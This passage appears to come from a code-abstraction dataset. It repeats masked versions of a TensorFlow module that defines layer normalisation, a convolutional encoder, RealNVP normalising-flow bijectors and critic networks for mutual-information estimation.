self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = 
tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n 
y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
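LayerNorm, still intact in the entry above, normalises each example over the configured axes and then applies a per-channel scale and bias. A small NumPy sketch of the same computation (the axes and shapes below are illustrative):

import numpy as np

def layer_norm(x, scale, bias, axes=(1, 2, 3), eps=1e-6):
    mean = x.mean(axis=axes, keepdims=True)
    std = x.std(axis=axes, keepdims=True)
    return (x - mean) / (std + eps) * scale + bias

x = np.random.default_rng(3).normal(size=(2, 7, 7, 16))    # [batch, h, w, channels]
out = layer_norm(x, scale=np.ones(16), bias=np.zeros(16))
print(out.shape, out.mean(axis=(1, 2, 3)))                  # per-example means are ~0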
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n\n\nclass LayerNorm(tfkl.Layer):\n <docstring token>\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is 
None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function 
token>\n<function token>\n<function token>\n<code token>\n",
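RealNVPBijector stacks such couplings with fixed random permutations so that every dimension is eventually transformed. The sketch below is a plain-NumPy stand-in for that idea; it ignores tfb.Chain's exact application order and uses toy affine conditioners rather than real_nvp_default_template:

import numpy as np

def affine_coupling(x, cond):
    """Transform the second half of x with (shift, log_scale) predicted from the first half."""
    d = x.shape[-1] // 2
    x0, x1 = x[..., :d], x[..., d:]
    shift, log_scale = cond(x0)
    return np.concatenate([x0, x1 * np.exp(log_scale) + shift], axis=-1)

def make_flow(dim, n_couplings, rng):
    perms = [rng.permutation(dim) for _ in range(n_couplings)]
    params = [(rng.normal(size=(dim // 2, dim - dim // 2)) * 0.1,
               rng.normal(size=dim - dim // 2)) for _ in range(n_couplings)]
    def forward(x):
        for perm, (A, b) in zip(perms, params):
            cond = lambda x0: (x0 @ A + b, np.tanh(x0 @ A))
            x = affine_coupling(x, cond)[..., perm]    # couple, then shuffle dimensions
        return x
    return forward

flow = make_flow(6, 4, np.random.default_rng(4))
print(flow(np.random.default_rng(5).normal(size=(3, 6))).shape)   # (3, 6)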
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n\n\nclass LayerNorm(tfkl.Layer):\n <docstring token>\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n <function token>\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., 
:self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n\n\nclass LayerNorm(tfkl.Layer):\n <docstring token>\n <function token>\n <function token>\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., 
self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
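The MLP.__call__ body that survives in the earlier entries adds each layer's output back to its input whenever shortcuts is set, i.e. a residual MLP whose layer widths must match. A NumPy stand-in with untrained random weights:

import numpy as np

def mlp_forward(x, weights, shortcuts=True):
    for i, (W, b) in enumerate(weights):
        h = x @ W + b
        if i < len(weights) - 1:
            h = np.maximum(h, 0.0)          # hidden activations; the last layer stays linear
        x = h + x if shortcuts else h       # residual shortcut assumes matching widths
    return x

rng = np.random.default_rng(7)
dims = 16
weights = [(rng.normal(size=(dims, dims)) * 0.1, np.zeros(dims)) for _ in range(3)]
print(mlp_forward(rng.normal(size=(4, dims)), weights).shape)   # (4, 16)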
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n<class token>\n\n\nclass LayerNorm(tfkl.Layer):\n <docstring token>\n <function token>\n <function token>\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n <function token>\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - 
self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, 